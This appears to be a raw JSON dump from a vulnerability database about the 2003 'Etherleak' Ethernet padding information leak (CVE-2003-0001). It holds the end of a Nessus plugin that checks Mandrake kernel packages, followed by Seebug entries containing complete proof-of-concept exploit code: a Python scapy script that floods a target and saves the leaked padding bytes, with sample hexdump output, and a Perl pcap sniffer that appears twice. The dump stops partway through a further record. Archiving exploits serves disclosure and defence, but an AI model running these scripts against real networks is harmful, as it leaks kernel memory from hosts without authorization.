http://www.mandrakesecure.net/en/docs/magic.php.\n\nUpdate :\n\nThe kernels provided in MDKSA-2003:066-1 (2.4.21-0.24mdk) had a problem where all files created on any filesystem other than XFS, and using any kernel other than kernel-secure, would be created with mode 0666, or world writeable. The 0.24mdk kernels have been removed from the mirrors and users are encouraged to upgrade and remove those kernels from their systems to prevent accidentally booting into them.\n\nThat issue has been addressed and fixed with these new kernels.", "edition": 6, "reporter": "Tenable", "published": "2004-07-31T00:00:00", "title": "Mandrake Linux Security Advisory : kernel (MDKSA-2003:066-2)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Mandriva Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0248", "CVE-2003-0247", "CVE-2003-0001", "CVE-2003-0246", "CVE-2003-0244", "CVE-2003-0462"], "modified": "2018-11-15T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:kernel-2.4.21.0.25mdk", "cpe:/o:mandrakesoft:mandrake_linux:9.1", "p-cpe:/a:mandriva:linux:kernel-enterprise-2.4.21.0.25mdk", "p-cpe:/a:mandriva:linux:kernel-BOOT-2.4.21.0.25mdk", "p-cpe:/a:mandriva:linux:kernel-smp-2.4.21.0.25mdk", "p-cpe:/a:mandriva:linux:kernel-source", "p-cpe:/a:mandriva:linux:kernel-secure-2.4.21.0.25mdk", "p-cpe:/a:mandriva:linux:kernel-doc"], "id": "MANDRAKE_MDKSA-2003-066.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=14049", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2003:066. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(14049);\n script_version (\"1.22\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\n\n script_cve_id(\"CVE-2003-0001\", \"CVE-2003-0244\", \"CVE-2003-0246\", \"CVE-2003-0247\", \"CVE-2003-0248\", \"CVE-2003-0462\");\n script_xref(name:\"MDKSA\", value:\"2003:066-2\");\n\n script_name(english:\"Mandrake Linux Security Advisory : kernel (MDKSA-2003:066-2)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities were discovered and fixed in the Linux\nkernel.\n\n - CVE-2003-0001: Multiple ethernet network card drivers do\n not pad frames with null bytes which allows remote\n attackers to obtain information from previous packets or\n kernel memory by using special malformed packets.\n\n - CVE-2003-0244: The route cache implementation in the 2.4\n kernel and the Netfilter IP conntrack module allows\n remote attackers to cause a Denial of Service (DoS) via\n CPU consumption due to packets with forged source\n addresses that cause a large number of hash table\n collisions related to the PREROUTING chain.\n\n - CVE-2003-0246: The ioperm implementation in 2.4.20 and\n earlier kernels does not properly restrict privileges,\n which allows local users to gain read or write access to\n certain I/O ports.\n\n - CVE-2003-0247: A vulnerability in the TTY layer of the\n 2.4 kernel allows attackers to cause a kernel oops\n resulting in a DoS.\n\n - CVE-2003-0248: The mxcsr code in the 2.4 kernel allows\n attackers to modify CPU state registers via a malformed\n address.\n\n - CVE-2003-0462: A file read race existed in the execve()\n system call.\n\nAs well, a number of bug fixes were made in the 9.1 kernel including :\n\n - Support for more machines that did not work with APIC\n\n - Audigy2 support\n\n - New/updated modules: prims25, adiusbadsl, thinkpad,\n ieee1394, orinoco, via-rhine,\n\n - Fixed SiS IOAPIC\n\n - IRQ balancing has been fixed for SMP\n\n - Updates to ext3\n\n - The previous ptrace fix has been redone to work better\n\n - Bugs with compiling kernels using xconfig have been\n fixed\n\n - Problems with ipsec have been corrected\n\n - XFS ACLs are now present\n\n - gdb not working on XFS root filesystems has been fixed\n\nMandrakeSoft encourages all users to upgrade to these new kernels.\nUpdated kernels will be available shortly for other supported\nplatforms and architectures.\n\nFor full instructions on how to properly upgrade your kernel, please\nreview http://www.mandrakesecure.net/en/docs/magic.php.\n\nUpdate :\n\nThe kernels provided in MDKSA-2003:066-1 (2.4.21-0.24mdk) had a\nproblem where all files created on any filesystem other than XFS, and\nusing any kernel other than kernel-secure, would be created with mode\n0666, or world writeable. The 0.24mdk kernels have been removed from\nthe mirrors and users are encouraged to upgrade and remove those\nkernels from their systems to prevent accidentally booting into them.\n\nThat issue has been addressed and fixed with these new kernels.\"\n );\n # http://marc.theaimsgroup.com/?l=bugtraq&m=105664924024009&w=2\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l=bugtraq&m=105664924024009&w=2\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-2.4.21.0.25mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-BOOT-2.4.21.0.25mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-enterprise-2.4.21.0.25mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-secure-2.4.21.0.25mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-smp-2.4.21.0.25mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/07/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"kernel-2.4.21.0.25mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"kernel-BOOT-2.4.21.0.25mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"kernel-doc-2.4.21-0.25mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"kernel-enterprise-2.4.21.0.25mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"kernel-secure-2.4.21.0.25mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"kernel-smp-2.4.21.0.25mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"kernel-source-2.4.21-0.25mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T15:04:05", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "No description provided by source.", "reporter": "Root", "published": "2014-07-01T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "Cisco ASA < 8.4.4.6 & 8.2.5.32 - Ethernet Information Leak", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0001"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-79723", "id": "SSV:79723", "sourceData": "\n #!/usr/bin/env python\r\n# CVE-2003-0001 'Etherleak' exploit\r\n# =================================\r\n# Exploit for hosts which use a network device driver that pads \r\n# ethernet frames with data which vary from one packet to another, \r\n# likely taken from kernel memory, system memory allocated to \r\n# the device driver, or a hardware buffer on its network interface \r\n# card. Exploit uses scapy with either ICMP or ARP requests as \r\n# this can trigger with either but ICMP can hit layer3 filtering \r\n# rules. Using ARP the padding appears to leak only fixed constant \r\n# values when exploited, ICMP leaks random bytes. \r\n#\r\n# root@bt:~/0d# python cve-2003-0001.py x.x.x.254 icmp leaky\r\n# WARNING: No route found for IPv6 destination :: (no default route?)\r\n# [ CVE-2003-0001 'Etherleak' exploit\r\n# [ Attacking x.x.x.254 for icmp padding saved to leaky.hex\r\n# ............................................................^C!Killing\r\n# !Killing\r\n# root@bt:~/0d# hexdump -C leaky | head\r\n# 00000000 e6 bd a6 9b 90 eb 44 f5 18 a5 29 2a 16 5a 08 ff |......D...)*.Z..|\r\n# 00000010 43 e1 23 07 8f 96 5a 24 3f 3d 33 7d b4 97 7e 18 |C.#...Z$?=3}..~.|\r\n# 00000020 05 c9 7c 2c a5 c0 fa 7a 76 f3 51 c0 fe 07 72 32 |..|,...zv.Q...r2|\r\n# 00000030 9e ad 6a 67 ad 43 58 17 60 43 bc 2b b8 fb cc 70 |..jg.CX.`C.+...p|\r\n# 00000040 99 92 80 84 03 03 6f 8f 18 d3 5b 5e f0 1e 3a 83 |......o...[^..:.|\r\n# 00000050 3d 82 e7 cd 3e 1f 31 74 b0 06 8c a2 7e 14 6b fb |=...>.1t....~.k.|\r\n# 00000060 72 9b ac 64 74 9b a4 d9 23 5b 92 82 0d 0b 31 f0 |r..dt...#[....1.|\r\n# 00000070 a9 4f dd 3f bf 2b 5c 67 6c 22 fa da d0 2b d6 39 |.O.?.+\\gl"...+.9|\r\n# 00000080 40 58 13 4f 3d bb 48 03 d3 53 3c 5c 44 d2 3d b2 |@X.O=.H..S<\\D.=.|\r\n# 00000090 4f f2 a9 4a 02 80 4e 1b 6c bd 69 89 bd 76 1b 0a |O..J..N.l.i..v..|\r\n#\r\n# This issue has been resolved in ASA 8.4.4.6/8.2.5.32. Cisco Bug reference\r\n# is CSCua88376 and PSIRT-0669464365.\r\n#\r\n# -- prdelka\r\n#\r\nimport os\r\nimport sys\r\nimport signal\r\nimport binascii\r\nfrom scapy.all import *\r\n\r\ndef signalhandler(signal,id):\r\n\tprint "!Killing"\r\n\tsys.exit(0)\r\n\r\ndef spawn(host,type):\r\n\tif type == 'arp':\r\n\t\tsend(ARP(pdst=host),loop=1,nofilter=1)\r\n\telif type == 'icmp':\r\n\t\tsend(IP(dst=host)/ICMP(type=8)/'x',loop=1,nofilter=1)\t\t\r\n\r\nif __name__ == "__main__":\r\n\tprint "[ CVE-2003-0001 'Etherleak' exploit"\r\n\tsignal.signal(signal.SIGINT,signalhandler)\r\n\tif len(sys.argv) < 4:\r\n\t\tprint "[ No! Use with <host> <arp|icmp> <file>"\r\n\t\tsys.exit(1)\r\n\ttype = sys.argv[2]\r\n\tif type == 'arp':\r\n\t\tpass\r\n\telif type == 'icmp':\r\n\t\tpass\r\n\telse:\r\n\t\tprint "Bad type!"\r\n\t\tsys.exit(0)\r\n\tpid = os.fork()\r\n\tif(pid):\r\n\t\tprint "[ Attacking %s for %s padding saved to %s.hex" % (sys.argv[1],sys.argv[2],sys.argv[3])\r\n\t\tspawn(sys.argv[1],sys.argv[2])\r\n\twhile True:\r\n\t\tif type == 'arp':\r\n\t\t\tmyfilter = "host %s and arp" % sys.argv[1]\r\n\t\telif type == 'icmp':\r\n\t\t\tmyfilter = "host %s and icmp" % sys.argv[1]\r\n\t\tx = sniff(count=1,filter=myfilter,lfilter=lambda x: x.haslayer(Padding))\r\n\t\tp = x[0]\r\n\t\tif type == 'arp':\r\n\t\t\tpad = p.getlayer(2)\r\n\t\tif type == 'icmp':\r\n\t\t\tpad = p.getlayer(4)\r\n\t\tleak = str(pad)\r\n\t\thexfull = binascii.b2a_hex(leak)\r\n\t\tfile = "%s.hex"%sys.argv[3]\r\n\t\tfdesc = open(file,"a")\r\n\t\tfdesc.write(hexfull + "\\n")\r\n\t\tfdesc.close()\r\n\t\t# 32 bits leaked here for me.\r\n\t\tif type == 'icmp':\r\n\t\t\tbytes = leak[9:13]\r\n\t\telif type == 'arp':\r\n\t\t\tbytes = leak[10:14]\r\n\t\tfdesc = open(sys.argv[3],"ab")\r\n\t\tfdesc.write(bytes)\r\n\t\tfdesc.close()\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-79723", "status": "cve,poc"}, {"lastseen": "2017-11-19T22:07:10", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "No description provided by source.", "reporter": "Root", "published": "2007-03-24T00:00:00", "type": "seebug", "title": "Ethernet Device Drivers Frame Padding Info Leakage Exploit (Etherleak)", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0001"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2007-03-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-6453", "id": "SSV:6453", "sourceData": "\n #!/usr/bin/perl -w\r\n# etherleak, code that has been 5 years coming.\r\n#\r\n# On 04/27/2002, I disclosed on the Linux Kernel Mailing list,\r\n# a vulnerability that would be come known as the 'etherleak' bug. In\r\n# various situations an ethernet frame must be padded to reach a specific\r\n# size or fall on a certain boundary. This task is left up to the driver\r\n# for the ethernet device. The RFCs state that this padding must consist\r\n# of NULLs. The bug is that at the time and still to this day, many device\r\n# drivers do not pad will NULLs, but rather pad with unsanitized portions\r\n# of kernel memory, oftentimes exposing sensitive information to remote\r\n# systems or those savvy enough to coerce their targets to do so.\r\n#\r\n# Proof of this can be found by googling for 'warchild and etherleak', or\r\n# by visiting:\r\n#\r\n# http://lkml.org/lkml/2002/4/27/101\r\n#\r\n# This was ultimately fixed in the Linux kernel, but over time this\r\n# vulnerability reared its head numerous times, but at the core the\r\n# vulnerability was the same as the one I originally published. The most\r\n# public of these was CVE-2003-0001, which was assigned to address an\r\n# official @stake advisory.\r\n#\r\n# This code can be found its most current form at:\r\n# \r\n# http://spoofed.org/files/exploits/etherleak\r\n#\r\n# Jon Hart <jhart@spoofed.org>, March 2007\r\n#\r\n\r\nuse strict;\r\nuse diagnostics;\r\nuse warnings;\r\nuse Getopt::Long;\r\nuse Net::Pcap;\r\nuse NetPacket::Ethernet qw(:ALL);\r\nuse NetPacket::IP qw(:ALL);\r\n\r\nmy %opts = ();\r\nmy ($iface, $err, $pcap_t, $pcap_save, $filter_string); \r\n\r\nGetOptions( \\%opts, 'help', 'filter=s', 'interface=s', 'quiet', 'read=s', 'write=s', 'verbose') or\r\n die "Unknown option: $!\\n" && &usage();\r\n\r\nif (defined($opts{'help'})) {\r\n &usage();\r\n exit(0);\r\n}\r\n\r\nif (defined($opts{'read'})) {\r\n $pcap_t = Net::Pcap::open_offline($opts{'read'}, \\$err);\r\n if (!defined($pcap_t)) {\r\n print("Net::Pcap::open_offline failed: $err\\n");\r\n exit 1;\r\n }\r\n} else {\r\n if (defined($opts{'interface'})) {\r\n $iface = $opts{'interface'};\r\n } else {\r\n $iface = Net::Pcap::lookupdev(\\$err);\r\n if (defined($err)) {\r\n print(STDERR "lookupdev() failed: $err\\n");\r\n exit(1);\r\n } else {\r\n print(STDERR "No interface specified. Using $iface\\n");\r\n }\r\n }\r\n\r\n $pcap_t = Net::Pcap::open_live($iface, 65535, 1, 0, \\$err);\r\n if (!defined($pcap_t)) {\r\n print("Net::Pcap::open_live failed on $iface: $err\\n");\r\n exit 1;\r\n }\r\n}\r\n\r\nmy $filter;\r\nif (Net::Pcap::compile($pcap_t, \\$filter, defined($opts{'filter'}) ? $opts{'filter'} : "", 0, 0) == -1) {\r\n printf("Net::Pcap::compile failed: %s\\n", Net::Pcap::geterr($pcap_t));\r\n exit(1);\r\n}\r\n\r\nif (Net::Pcap::setfilter($pcap_t, $filter) == -1) {\r\n printf("Net::Pcap::setfilter failed: %s\\n", Net::Pcap::geterr($pcap_t));\r\n exit(1);\r\n}\r\n\r\nif (defined($opts{'write'})) {\r\n $pcap_save = Net::Pcap::dump_open($pcap_t, $opts{'write'});\r\n if (!defined($pcap_save)) {\r\n printf("Net::Pcap::dump_open failed: %s\\n", Net::Pcap::geterr($pcap_t));\r\n exit(1);\r\n }\r\n}\r\n\r\nNet::Pcap::loop($pcap_t, -1, \\&process, "foo");\r\nNet::Pcap::close($pcap_t);\r\n\r\nif (defined($opts{'write'})) {\r\n Net::Pcap::dump_close($pcap_save);\r\n}\r\n\r\n\r\n\r\nsub process {\r\n my ($user, $hdr, $pkt) = @_;\r\n my ($link, $ip);\r\n my $jump = 0;\r\n\r\n my $datalink = Net::Pcap::datalink($pcap_t);\r\n if ($datalink == 1) { $jump += 14; }\r\n elsif ($datalink == 113) { $jump += 16; }\r\n else { printf("Skipping datalink $datalink\\n"); return; }\r\n\r\n my $l2 = NetPacket::Ethernet->decode($pkt);\r\n \r\n if ($l2->{type} == ETH_TYPE_IP) {\r\n $ip = NetPacket::IP->decode(eth_strip($pkt));\r\n $jump += $ip->{len};\r\n } elsif ($l2->{type} == ETH_TYPE_ARP) { $jump += 28; }\r\n else { \r\n # assume 802.3 ethernet, and just jump ahead the length\r\n for ($l2->{dest_mac}) {\r\n if (/^0180c200/) {\r\n # spanning tree\r\n # l2->{type} here will actually be the length. HACK.\r\n $jump += $l2->{type};\r\n }\r\n elsif (/^01000ccccc/) {\r\n # CDP/VTP/DTP/PAgP/UDLD/PVST, etc\r\n # l2->{type} here will actually be the length. HACK.\r\n $jump += $l2->{type};\r\n } elsif (/^ab0000020000/) {\r\n # DEC-MOP-Remote-Console\r\n return;\r\n } else {\r\n # loopback\r\n if ($l2->{src_mac} eq $l2->{dest_mac}) { return; }\r\n printf("Skipping datalink $datalink l2 type %s\\n", $l2->{type}); return;\r\n }\r\n }\r\n }\r\n\r\n\r\n if ($hdr->{len} > $jump) {\r\n my $trailer_bin = substr($pkt, $jump);\r\n my $trailer_hex = "";\r\n my $trailer_ascii = "";\r\n foreach (split(//, $trailer_bin)) {\r\n $trailer_hex .= sprintf("%02x", ord($_));\r\n if (ord($_) >= 32 && ord($_) <= 126) {\r\n $trailer_ascii .= $_;\r\n } else { $trailer_ascii .= "."; }\r\n }\r\n # ignore all trailers that are just single characters repeated.\r\n # most OS' use 0, F, 5 or a.\r\n unless ($trailer_hex =~ /^(0|5|f|a)\\1*$/i) {\r\n unless ($opts{'quiet'}) {\r\n print("#"x80, "\\n");\r\n printf("%s -> %s\\n", $l2->{src_mac}, $l2->{dest_mac});\r\n if ($l2->{type} == ETH_TYPE_IP) {\r\n printf("%s -> %s\\n", $ip->{src_ip}, $ip->{dest_ip});\r\n }\r\n }\r\n print("$trailer_hex\\t$trailer_ascii\\n");\r\n if (defined($opts{'write'})) {\r\n Net::Pcap::dump($pcap_save, $hdr, $pkt);\r\n }\r\n }\r\n }\r\n}\r\n\r\nsub usage {\r\n print <<EOF;\r\n$0 -- A demonstration of the infamous 'etherleak' bug.\r\n\r\n CVE-2003-0001, and countless repeats of the same vulnerability.\r\n\r\n Options:\r\n [-h|--help] # this message\r\n [-i|--interface] <interface> # interface to listen on\r\n [-f|--filter] <pcap filter> # apply this filter to the traffic\r\n [-r|--read] <path to pcap> # read from this saved pcap file\r\n [-w|--write] <path to pcap> # write tothis saved pcap file\r\n [-q|--quiet] # be quiet\r\n [-v|--verbose] # be verbose\r\n\r\nEOF\r\n\r\n\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-6453", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "status": "poc"}, {"lastseen": "2017-11-19T16:09:02", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "No description provided by source.", "reporter": "Root", "published": "2014-07-01T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Linux Kernel 2.0.x/2.2.x/2.4.x,FreeBSD 4.x Network Device Driver Frame Padding Information Disclosure", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0001"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-75942", "id": "SSV:75942", "sourceData": "\n source: http://www.securityfocus.com/bid/6535/info\r\n\r\nNetwork device drivers for several vendors have been reported to disclose potentially sensitive information to attackers.\r\n\r\nFrames that are smaller than the minimum frame size should have the unused portion of the frame buffer padded with null (or other) bytes. Some device drivers fail to do this adequately, leaving the data that was stored in the memory comprising the buffer prior to its use intact. Consequently, this data may be transmitted within frames across Ethernet segments. Since the Ethernet frame buffer is allocated in kernel memory space, sensitive data may be leaked.\r\n\r\nCisco has stated that the IOS 12.1 and 12.2 trains are not affected.\r\n\r\nNational Semiconductor Ethernet controller chips are not vulnerable to this issue. \r\n\r\n#!/usr/bin/perl -w\r\n# etherleak, code that has been 5 years coming.\r\n#\r\n# On 04/27/2002, I disclosed on the Linux Kernel Mailing list,\r\n# a vulnerability that would be come known as the 'etherleak' bug. In\r\n# various situations an ethernet frame must be padded to reach a specific\r\n# size or fall on a certain boundary. This task is left up to the driver\r\n# for the ethernet device. The RFCs state that this padding must consist\r\n# of NULLs. The bug is that at the time and still to this day, many device\r\n# drivers do not pad will NULLs, but rather pad with unsanitized portions\r\n# of kernel memory, oftentimes exposing sensitive information to remote\r\n# systems or those savvy enough to coerce their targets to do so.\r\n#\r\n# Proof of this can be found by googling for 'warchild and etherleak', or\r\n# by visiting:\r\n#\r\n# http://lkml.org/lkml/2002/4/27/101\r\n#\r\n# This was ultimately fixed in the Linux kernel, but over time this\r\n# vulnerability reared its head numerous times, but at the core the\r\n# vulnerability was the same as the one I originally published. The most\r\n# public of these was CVE-2003-0001, which was assigned to address an\r\n# official @stake advisory.\r\n#\r\n# This code can be found its most current form at:\r\n# \r\n# http://spoofed.org/files/exploits/etherleak\r\n#\r\n# Jon Hart <jhart@spoofed.org>, March 2007\r\n#\r\n\r\nuse strict;\r\nuse diagnostics;\r\nuse warnings;\r\nuse Getopt::Long;\r\nuse Net::Pcap;\r\nuse NetPacket::Ethernet qw(:ALL);\r\nuse NetPacket::IP qw(:ALL);\r\n\r\nmy %opts = ();\r\nmy ($iface, $err, $pcap_t, $pcap_save, $filter_string); \r\n\r\nGetOptions( \\%opts, 'help', 'filter=s', 'interface=s', 'quiet', 'read=s', 'write=s', 'verbose') or\r\n die "Unknown option: $!\\n" && &usage();\r\n\r\nif (defined($opts{'help'})) {\r\n &usage();\r\n exit(0);\r\n}\r\n\r\nif (defined($opts{'read'})) {\r\n $pcap_t = Net::Pcap::open_offline($opts{'read'}, \\$err);\r\n if (!defined($pcap_t)) {\r\n print("Net::Pcap::open_offline failed: $err\\n");\r\n exit 1;\r\n }\r\n} else {\r\n if (defined($opts{'interface'})) {\r\n $iface = $opts{'interface'};\r\n } else {\r\n $iface = Net::Pcap::lookupdev(\\$err);\r\n if (defined($err)) {\r\n print(STDERR "lookupdev() failed: $err\\n");\r\n exit(1);\r\n } else {\r\n print(STDERR "No interface specified. Using $iface\\n");\r\n }\r\n }\r\n\r\n $pcap_t = Net::Pcap::open_live($iface, 65535, 1, 0, \\$err);\r\n if (!defined($pcap_t)) {\r\n print("Net::Pcap::open_live failed on $iface: $err\\n");\r\n exit 1;\r\n }\r\n}\r\n\r\nmy $filter;\r\nif (Net::Pcap::compile($pcap_t, \\$filter, defined($opts{'filter'}) ? $opts{'filter'} : "", 0, 0) == -1) {\r\n printf("Net::Pcap::compile failed: %s\\n", Net::Pcap::geterr($pcap_t));\r\n exit(1);\r\n}\r\n\r\nif (Net::Pcap::setfilter($pcap_t, $filter) == -1) {\r\n printf("Net::Pcap::setfilter failed: %s\\n", Net::Pcap::geterr($pcap_t));\r\n exit(1);\r\n}\r\n\r\nif (defined($opts{'write'})) {\r\n $pcap_save = Net::Pcap::dump_open($pcap_t, $opts{'write'});\r\n if (!defined($pcap_save)) {\r\n printf("Net::Pcap::dump_open failed: %s\\n", Net::Pcap::geterr($pcap_t));\r\n exit(1);\r\n }\r\n}\r\n\r\nNet::Pcap::loop($pcap_t, -1, \\&process, "foo");\r\nNet::Pcap::close($pcap_t);\r\n\r\nif (defined($opts{'write'})) {\r\n Net::Pcap::dump_close($pcap_save);\r\n}\r\n\r\n\r\n\r\nsub process {\r\n my ($user, $hdr, $pkt) = @_;\r\n my ($link, $ip);\r\n my $jump = 0;\r\n\r\n my $datalink = Net::Pcap::datalink($pcap_t);\r\n if ($datalink == 1) { $jump += 14; }\r\n elsif ($datalink == 113) { $jump += 16; }\r\n else { printf("Skipping datalink $datalink\\n"); return; }\r\n\r\n my $l2 = NetPacket::Ethernet->decode($pkt);\r\n \r\n if ($l2->{type} == ETH_TYPE_IP) {\r\n $ip = NetPacket::IP->decode(eth_strip($pkt));\r\n $jump += $ip->{len};\r\n } elsif ($l2->{type} == ETH_TYPE_ARP) { $jump += 28; }\r\n else { \r\n # assume 802.3 ethernet, and just jump ahead the length\r\n for ($l2->{dest_mac}) {\r\n if (/^0180c200/) {\r\n # spanning tree\r\n # l2->{type} here will actually be the length. HACK.\r\n $jump += $l2->{type};\r\n }\r\n elsif (/^01000ccccc/) {\r\n # CDP/VTP/DTP/PAgP/UDLD/PVST, etc\r\n # l2->{type} here will actually be the length. HACK.\r\n $jump += $l2->{type};\r\n } elsif (/^ab0000020000/) {\r\n # DEC-MOP-Remote-Console\r\n return;\r\n } else {\r\n # loopback\r\n if ($l2->{src_mac} eq $l2->{dest_mac}) { return; }\r\n printf("Skipping datalink $datalink l2 type %s\\n", $l2->{type}); return;\r\n }\r\n }\r\n }\r\n\r\n\r\n if ($hdr->{len} > $jump) {\r\n my $trailer_bin = substr($pkt, $jump);\r\n my $trailer_hex = "";\r\n my $trailer_ascii = "";\r\n foreach (split(//, $trailer_bin)) {\r\n $trailer_hex .= sprintf("%02x", ord($_));\r\n if (ord($_) >= 32 && ord($_) <= 126) {\r\n $trailer_ascii .= $_;\r\n } else { $trailer_ascii .= "."; }\r\n }\r\n # ignore all trailers that are just single characters repeated.\r\n # most OS' use 0, F, 5 or a.\r\n unless ($trailer_hex =~ /^(0|5|f|a)\\1*$/i) {\r\n unless ($opts{'quiet'}) {\r\n print("#"x80, "\\n");\r\n printf("%s -> %s\\n", $l2->{src_mac}, $l2->{dest_mac});\r\n if ($l2->{type} == ETH_TYPE_IP) {\r\n printf("%s -> %s\\n", $ip->{src_ip}, $ip->{dest_ip});\r\n }\r\n }\r\n print("$trailer_hex\\t$trailer_ascii\\n");\r\n if (defined($opts{'write'})) {\r\n Net::Pcap::dump($pcap_save, $hdr, $pkt);\r\n }\r\n }\r\n }\r\n}\r\n\r\nsub usage {\r\n print <<EOF;\r\n$0 -- A demonstration of the infamous 'etherleak' bug.\r\n\r\n CVE-2003-0001, and countless repeats of the same vulnerability.\r\n\r\n Options:\r\n [-h|--help] # this message\r\n [-i|--interface] <interface> # interface to listen on\r\n [-f|--filter] <pcap filter> # apply this filter to the traffic\r\n [-r|--read] <path to pcap> # read from this saved pcap file\r\n [-w|--write] <path to pcap> # write tothis saved pcap file\r\n [-q|--quiet] # be quiet\r\n [-v|--verbose] # be verbose\r\n\r\nEOF\r\n\r\n\r\n}\r\n\r\n# milw0rm.com [2007-03-23]\r\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-75942", "status": "cve,poc"}, {"lastseen": "2017-11-19T14:21:46", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "No description provided by source.", "reporter": "Root", "published": "2014-07-01T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Ethernet Device Drivers Frame Padding - Info Leakage Exploit (Etherleak)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0001"], 